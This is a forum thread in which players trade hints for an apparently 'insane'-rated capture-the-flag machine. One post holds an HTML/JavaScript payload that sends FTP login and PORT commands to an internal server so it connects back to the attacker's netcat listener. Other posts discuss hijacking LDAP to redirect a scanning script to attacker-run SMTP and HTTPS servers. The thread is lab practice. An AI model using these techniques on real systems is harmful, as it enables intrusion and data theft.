(July 4, 2022, 02:29 PM)OperationBlueSun Wrote:

(July 4, 2022, 07:08 AM)Exa Wrote:

(July 3, 2022, 11:28 PM)OperationBlueSun Wrote:

(July 3, 2022, 09:27 PM)Exa Wrote:

(July 3, 2022, 08:58 PM)OperationBlueSun Wrote: @Exa in what context are you executing the javascript?

You are hosting that file on your own web server and sending bob a link to that file.

Thanks, but no luck. I tried both the captured message format and just the script tags in message file. I also changed the example ftp port using the formula.

This is the HTML file I used (some parts are retracted):

<html>
  <body>
    <script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.###.###:2121/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// Open a netcat listener on port 3333 (13*256+5).
xhr.send("USER ftp_user
PASS ############
PORT 10,10,###,###,13,5
LIST
");
    </script>
  </body>
</html>

@Exa Thanks! I wasn't adding proper html tags...

@Exa I have no clue what I'm doing wrong. Bob gets the message from my http server, but I never see a connection attempt to my netcat listener on port 3333. I have no local firewall rules that would interfere and I've never had problems with reverse shells and such. Any hints?

@OperationBlueSun I sent you a DM.

I tried changing scryh's password using ldappasswd with admin creds and then using su, but it didn't work... the password is not valid. Anyone have any luck? On second thought, it doesn't look like ldap is being used to manage Linux or ssh logons.

We know we can repurpose ldap , but to steal scryh data from where ? nmap needs an https server... a bit lost here. My thinking hat is still charging

(July 3, 2022, 09:08 PM)undeadly Wrote:

(July 3, 2022, 12:14 PM)Cipher Wrote: Anyone have root key: or root hash

exploitation from bob -> scryh isn't that trivial. this is exactly why this box is insane level. and it's really insane...
root hash doesn't help you really. or just wait for some new shiny exploit for linux to pop-up.

i am already done user but i didn't access root flag from long time. I am tired from this machine so, i just want root hash for knowing some knowledge . I dont want to leave this machine. If you gime me hint thats enough for me, Can you gime me hint for this machine.
Thanks

(July 6, 2022, 05:56 PM)OperationBlueSun Wrote: I tried changing scryh's password using ldappasswd with admin creds and then using su, but it didn't work... the password is not valid. Anyone have any luck? On second thought, it doesn't look like ldap is being used to manage Linux or ssh logons.

Any new findings ?
you're right ldap doesn't set /etc/shadow password nor ssh keys. So my guess is we have to use ldap to make scan.sh to scan something else then send us bask a report to our own smtp server.
There's also a difference in the original ssl-cert.nse and the one in scryh's scripts directory. Might be something interesting here

update : I think I found the logic and if I'm right , yeah , this is insane thus very challenging !

a lot of interesting comments was already done by @toatoat
read his posts more carefully.

ldap here only for chat users' auth. but in this scheme ldap is the only thing you may repurpose.
try searching for ldap injections and ldap attacks (you should already have admin passwd for ldap).
it should finally point back to your instances of smpt, dns, https servers.
look for what you may change in ldap and how to make it point to you back..

for https "server" you could use this simple script, which i used for EarlyAccess machine (already retired now) + gen your own custom ssl keys:

import http.server, ssl

server_address = ('0.0.0.0', 4443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
                              server_side=True,
                              certfile='https_svr_key.pem',
                              ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()

(July 8, 2022, 04:15 PM)undeadly Wrote: a lot of interesting comments was already done by @toatoat
read his posts more carefully.

ldap here only for chat users' auth. but in this scheme ldap is the only thing you may repurpose.
try searching for ldap injections and ldap attacks (you should already have admin passwd for ldap).
it should finally point back to your instances of smpt, dns, https servers.
look for what you may change in ldap and how to make it point to you back..

for https "server" you could use this simple script, which i used for EarlyAccess machine (already retired now) + gen your own custom ssl keys:

import http.server, ssl

server_address = ('0.0.0.0', 4443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
                              server_side=True,
                              certfile='https_svr_key.pem',
                              ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()

already got ldap hijacked and https server running. smtp is the next. proofing and playing around :D

(July 8, 2022, 07:10 PM)yournamehere Wrote:

(July 8, 2022, 04:15 PM)undeadly Wrote: a lot of interesting comments was already done by @toatoat
read his posts more carefully.

ldap here only for chat users' auth. but in this scheme ldap is the only thing you may repurpose.
try searching for ldap injections and ldap attacks (you should already have admin passwd for ldap).
it should finally point back to your instances of smpt, dns, https servers.
look for what you may change in ldap and how to make it point to you back..

for https "server" you could use this simple script, which i used for EarlyAccess machine (already retired now) + gen your own custom ssl keys:

import http.server, ssl

server_address = ('0.0.0.0', 4443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
                              server_side=True,
                              certfile='https_svr_key.pem',
                              ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()

already got ldap hijacked and https server running. smtp is the next. proofing and playing around :D

you may try this one maybe -> https://github.com/ankraft/smtpproxy

Any tips for scryh->root? I'm trying to analyze `core.auto_update` with volatility3. I've tried creating symbols for Ubuntu 20.04 5.4.0-109-generic, but the dump is not recognized.